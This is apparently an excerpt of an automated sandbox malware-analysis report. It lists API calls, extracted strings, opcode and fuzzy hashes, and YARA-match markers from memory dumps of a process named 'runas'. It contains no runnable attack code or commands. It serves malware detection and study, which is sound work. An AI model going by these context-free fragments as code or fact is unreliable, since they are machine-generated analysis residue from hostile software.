                                                                                                              • Instruction Fuzzy Hash: A5E0D87121020427FB245958CC45FBB33587758764F090550B9A88B2C1DE67FA424190
                                                                                                              APIs
                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 0050864C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 3188754299-0
                                                                                                              • Opcode ID: 137ad55c2b2624d1fcbe85122e1ce2fcad3888f40c5e0a82762f691a4d894d2e
                                                                                                              • Instruction ID: 26bfd93031b9a50038ce82349bc08511e317b50f71dcad9856c980aecbe1f7f6
                                                                                                              • Opcode Fuzzy Hash: 137ad55c2b2624d1fcbe85122e1ce2fcad3888f40c5e0a82762f691a4d894d2e
                                                                                                              • Instruction Fuzzy Hash: F3E0807125030417FF245568DC45F7A37587754764F194950B95CDB1C1DD77FA418150
                                                                                                              APIs
                                                                                                              • PostThreadMessageW.USER32(?,00000111), ref: 005010E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: MessagePostThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 1836367815-0
                                                                                                              • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                              • Instruction ID: 51d79727d459871eb6a5aef52d2ee173023c54f2e4c11901f218a78328c57799
                                                                                                              • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                                              • Instruction Fuzzy Hash: 09D0A76770000C76A61145846CC2CFEB71CEB846A5F004067FB08D2040D9214D0206B1
                                                                                                              APIs
                                                                                                              • SetErrorMode.KERNELBASE(00008003,?,?,00502000,0051827F,?YQ,00501FC3), ref: 00508443
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2941481710.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4f0000_runas.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorMode
                                                                                                              • String ID:
                                                                                                              • API String ID: 2340568224-0
                                                                                                              • Opcode ID: 18781d1c6b367030a5622c59b903bfa11350597898cb3e7a9735be8269b8ce81
                                                                                                              • Instruction ID: de2bd90b93da5f9dddf02b5a236863ba94ce6d7606d17d513f40f1f413794ea2
                                                                                                              • Opcode Fuzzy Hash: 18781d1c6b367030a5622c59b903bfa11350597898cb3e7a9735be8269b8ce81
                                                                                                              • Instruction Fuzzy Hash: 2AD05E713903093BFA80A6E5CC47F6A36CC6B80794F454068BA48E62C2ED65F50086AA
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID:
                                                                                                              • API String ID: 2994545307-0
                                                                                                              • Opcode ID: 8d84fe57032b7575176fc6e9a6985454f9397b8bafea0a549fe7833569a51989
                                                                                                              • Instruction ID: 3046148f232eac4fe5e1cffca1d455894820f5819064ca6acde5d5b8d2cf20ac
                                                                                                              • Opcode Fuzzy Hash: 8d84fe57032b7575176fc6e9a6985454f9397b8bafea0a549fe7833569a51989
                                                                                                              • Instruction Fuzzy Hash: 16B02B318014C0C6FB00F72007087073A407BC0301F19C062F2030241E0738D0C0F171
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d030ac54c85d87903368dc597f3c423f24ff658546ca05aad49e368bbcbbc960
                                                                                                              • Instruction ID: 2ed5b8470102e88d84945dbd5ab0e4451fdbb1711cb41ce1f1c2d9ba70efde92
                                                                                                              • Opcode Fuzzy Hash: d030ac54c85d87903368dc597f3c423f24ff658546ca05aad49e368bbcbbc960
                                                                                                              • Instruction Fuzzy Hash: E341C77161CB0D4FE36CAF68A0917B6B3F1FF85314F505A2DD58AC3292EA70E8468685
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                              • API String ID: 0-3754132690
                                                                                                              • Opcode ID: 9d0c214882fc2e50237bb0f4810af6efe925b166f08956caa8cac9141d3dfa62
                                                                                                              • Instruction ID: 7fe5cd7fee703523042302dc5d5370d41a821be8aa027f0950ead3ee925fcf5c
                                                                                                              • Opcode Fuzzy Hash: 9d0c214882fc2e50237bb0f4810af6efe925b166f08956caa8cac9141d3dfa62
                                                                                                              • Instruction Fuzzy Hash: AB915FF04083948AC7198F54A0612AFFFB1EBC6305F15856DE7E6BB243C3BE89058B85
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 7ddfb18143f35cf42c4f8f1f4433be9d6f34d3b16c11457b564dcc875ec6d510
                                                                                                              • Instruction ID: f47332b80b74d632f5658adcf44a4e137aa05e63fa16a8fc9a02b174d543ae8b
                                                                                                              • Opcode Fuzzy Hash: 7ddfb18143f35cf42c4f8f1f4433be9d6f34d3b16c11457b564dcc875ec6d510
                                                                                                              • Instruction Fuzzy Hash: 33510DB5B00226BFDF10DF58999097EF7B8BB49204B54826BF455D7681E234FE40ABE0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                              • API String ID: 48624451-2108815105
                                                                                                              • Opcode ID: 84912a3d9b022a68a699d1143960d8fd3bfd605e946b9e53a3da07531e41b4ea
                                                                                                              • Instruction ID: 9d57b69c6f36d30b1d1e93c95b80cb82cb9dd780efd3243c9cc32d351feaef25
                                                                                                              • Opcode Fuzzy Hash: 84912a3d9b022a68a699d1143960d8fd3bfd605e946b9e53a3da07531e41b4ea
                                                                                                              • Instruction Fuzzy Hash: C151E471A00645BBDF20DE9DD89097EB7F8BB44204F048CAAF599D7681E674FE00AB60
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: *6/.$B,6B$B5-5$KB!$MVWL$RLPV$SBJ)$SPLR$TLSY$TVKB$WLRB$WQUL$WQUL
                                                                                                              • API String ID: 0-2660536534
                                                                                                              • Opcode ID: 345ca938f719f1729864ccf3c5c2e3c8e91c2c77728336aeb481991aeb7a8e53
                                                                                                              • Instruction ID: 225124982a4a9f87728492100eed239fd3b2aff437e7433729e0c2f0091fcb1a
                                                                                                              • Opcode Fuzzy Hash: 345ca938f719f1729864ccf3c5c2e3c8e91c2c77728336aeb481991aeb7a8e53
                                                                                                              • Instruction Fuzzy Hash: CE2136B090064CDFDF14DF90D5486EDBBB1FF14308F819169E829AB204D7719299CF89
                                                                                                              Strings
                                                                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04554655
                                                                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 04554787
                                                                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04554742
                                                                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 045546FC
                                                                                                              • ExecuteOptions, xrefs: 045546A0
                                                                                                              • Execute=1, xrefs: 04554713
                                                                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04554725
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                              • API String ID: 0-484625025
                                                                                                              • Opcode ID: 3e21cde52bd3ea4a36a0a2f217391675a0284bfeaea2e6dd2b2cfc3cecf70867
                                                                                                              • Instruction ID: 0580781ca8f8c227ac7b845ec8a50c8497d70db5a298f1361f549bd39fa0ba59
                                                                                                              • Opcode Fuzzy Hash: 3e21cde52bd3ea4a36a0a2f217391675a0284bfeaea2e6dd2b2cfc3cecf70867
                                                                                                              • Instruction Fuzzy Hash: C051E935A002197BFF10AAA8EC95FBD77A8FF49304F14049AE505A71A1E770BE45EF50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction ID: 6e7ba96b81f5547532738b6a7b0baf359db610f52d08b76060886785a713b4cf
                                                                                                              • Opcode Fuzzy Hash: d8848935565deeecae3b40dc4d36252ac36c0d5f22eb4f09df1253b8d6557a4c
                                                                                                              • Instruction Fuzzy Hash: BD02F471608342AFD705DF18C990AAFBBE5FFC8704F04892DB9994B264DB31E905DB92
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-$0$0
                                                                                                              • API String ID: 1302938615-699404926
                                                                                                              • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction ID: 44e6c26f01f6e219ca2a167ecbbb05f389d050025726fb94865b010d0197df61
                                                                                                              • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                              • Instruction Fuzzy Hash: 3781C270E052698FDF288E68DA907FEBBB1BF46310F18461BD861A72D1D734B940EB50
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$[$]:%u
                                                                                                              • API String ID: 48624451-2819853543
                                                                                                              • Opcode ID: 35eabebaf685a198310ecec90ccc93ae100ca9802641a9e2d9f22bd548eb4997
                                                                                                              • Instruction ID: a9659c3ee01358bee1fe62716c3af092e536cae1d25054101d32711a9d341417
                                                                                                              • Opcode Fuzzy Hash: 35eabebaf685a198310ecec90ccc93ae100ca9802641a9e2d9f22bd548eb4997
                                                                                                              • Instruction Fuzzy Hash: BF215176A00219ABDB10DFA9E840AAEBBE8FF44654F540566F905E3240E730E911ABA1
                                                                                                              Strings
                                                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 045502BD
                                                                                                              • RTL: Re-Waiting, xrefs: 0455031E
                                                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 045502E7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                              • API String ID: 0-2474120054
                                                                                                              • Opcode ID: 5a90d2a26b77881064872ee0e55c4d32c57614ce5b29c8c4a54547e56fc7344b
                                                                                                              • Instruction ID: 93c293708986c2d1a8828d7f9809a1e08e3f9cac2fd3a4fa28eebf6a18e16803
                                                                                                              • Opcode Fuzzy Hash: 5a90d2a26b77881064872ee0e55c4d32c57614ce5b29c8c4a54547e56fc7344b
                                                                                                              • Instruction Fuzzy Hash: 28E1AD356047419FD734CF28D894B2AB7E0BF88714F144A1AF9958B2E1E7B4F845EB42
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 04557B8E
                                                                                                              • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04557B7F
                                                                                                              • RTL: Re-Waiting, xrefs: 04557BAC
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 0-871070163
                                                                                                              • Opcode ID: 5d4889566bcf76f49f8b28dad8d9fc9dbe92c8786ebc7b1746c3a16e69bce61b
                                                                                                              • Instruction ID: 0ce4abac1d7d350387c3f0006dad011709d50fbb62542e139a16d52ebcc08248
                                                                                                              • Opcode Fuzzy Hash: 5d4889566bcf76f49f8b28dad8d9fc9dbe92c8786ebc7b1746c3a16e69bce61b
                                                                                                              • Instruction Fuzzy Hash: 1E41D1357007029FE720DE25D850B6AB7E5FF88720F100A1EF956DB6A0EB31F405AB91
                                                                                                              APIs
                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0455728C
                                                                                                              Strings
                                                                                                              • RTL: Resource at %p, xrefs: 045572A3
                                                                                                              • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04557294
                                                                                                              • RTL: Re-Waiting, xrefs: 045572C1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                              • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                              • API String ID: 885266447-605551621
                                                                                                              • Opcode ID: 6c9cb4ba14c65909562e1b63668df2518166ceb3741baffd95ce67d6c9d1b374
                                                                                                              • Instruction ID: 2865c80b953ca2c3e76ab29fe3205f63d04422f5f05a43271be62ef60f7706f4
                                                                                                              • Opcode Fuzzy Hash: 6c9cb4ba14c65909562e1b63668df2518166ceb3741baffd95ce67d6c9d1b374
                                                                                                              • Instruction Fuzzy Hash: 8441F235700202AFE720DE25EC41F6AB7A5FB88714F104A1AFD55EB250EB61F842ABD1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: %%%u$]:%u
                                                                                                              • API String ID: 48624451-3050659472
                                                                                                              • Opcode ID: fa4977d7ea45d35a690826731234c6b5e41837116a4ab7e54a4ecc265649b067
                                                                                                              • Instruction ID: c6a3d34a4bf31d41d165e263d0b774efb582665cbc1d95ea32e5f93dfb495f0d
                                                                                                              • Opcode Fuzzy Hash: fa4977d7ea45d35a690826731234c6b5e41837116a4ab7e54a4ecc265649b067
                                                                                                              • Instruction Fuzzy Hash: E0314572A00619AFDF20DE29DC40BEE77E8FB44614F544996F849E3140EB30BE449BA1
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: __aulldvrm
                                                                                                              • String ID: +$-
                                                                                                              • API String ID: 1302938615-2137968064
                                                                                                              • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction ID: 5e1db1dddf8bf1795ac7c0ae8d0bef4fe972a450fc7fb4786e9b7ed133084927
                                                                                                              • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                              • Instruction Fuzzy Hash: 2491D971E042369BDF24DF69DA816BEB7A1FF4A320F14461BE855E72C0E730B940A761
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943233572.00000000044B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 044B0000, based on PE: true
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.00000000045DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000012.00000002.2943233572.000000000464E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_44b0000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $$@
                                                                                                              • API String ID: 0-1194432280
                                                                                                              • Opcode ID: 21a890c26390de3054dedbbeb6274771591381eaa9d8aa047f9131b1866ed8bf
                                                                                                              • Instruction ID: e344483060cace033b3d77cf612c0583cb478d0fd2691076b5db7b7760892e02
                                                                                                              • Opcode Fuzzy Hash: 21a890c26390de3054dedbbeb6274771591381eaa9d8aa047f9131b1866ed8bf
                                                                                                              • Instruction Fuzzy Hash: 658109B1D002699BDB318F54CC44BEAB7B4BF48755F0441EAE919B7280E730AE85DFA0
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (5&?$)#.;$*$co+*
                                                                                                              • API String ID: 0-3696694785
                                                                                                              • Opcode ID: bb8a81b06ffb0d376b4e3ae73c31d08ad200b31a9f5ea6ed8a597375d42aa11a
                                                                                                              • Instruction ID: 0edbf5c5de2ed5b8dacd6221cdc194f24307c23d19144c71d5f143d46b656374
                                                                                                              • Opcode Fuzzy Hash: bb8a81b06ffb0d376b4e3ae73c31d08ad200b31a9f5ea6ed8a597375d42aa11a
                                                                                                              • Instruction Fuzzy Hash: 92F0E221018B888BCB046B14D48059A7BD1FB8970DF801B6DE88ED72A1EA79D609C78B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000012.00000002.2943079379.0000000004300000.00000040.00000800.00020000.00000000.sdmp, Offset: 04300000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_18_2_4300000_runas.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .d(%$; $F9p{$p{8@
                                                                                                              • API String ID: 0-1339804953
                                                                                                              • Opcode ID: 4d256f719f28eec0328a44b88e5b506bce7dbdadeac2d50cefe524b9ee06f2a8
                                                                                                              • Instruction ID: e8bb16c07524c4d3ca41fb48e5157a7663efc583c67d0e3b9a69b8318468e182
                                                                                                              • Opcode Fuzzy Hash: 4d256f719f28eec0328a44b88e5b506bce7dbdadeac2d50cefe524b9ee06f2a8
                                                                                                              • Instruction Fuzzy Hash: 8CF0A030018B844BDB09AB10D44469BBBD1FBC830CF400B5DE8CEDA294DAB9D601C74A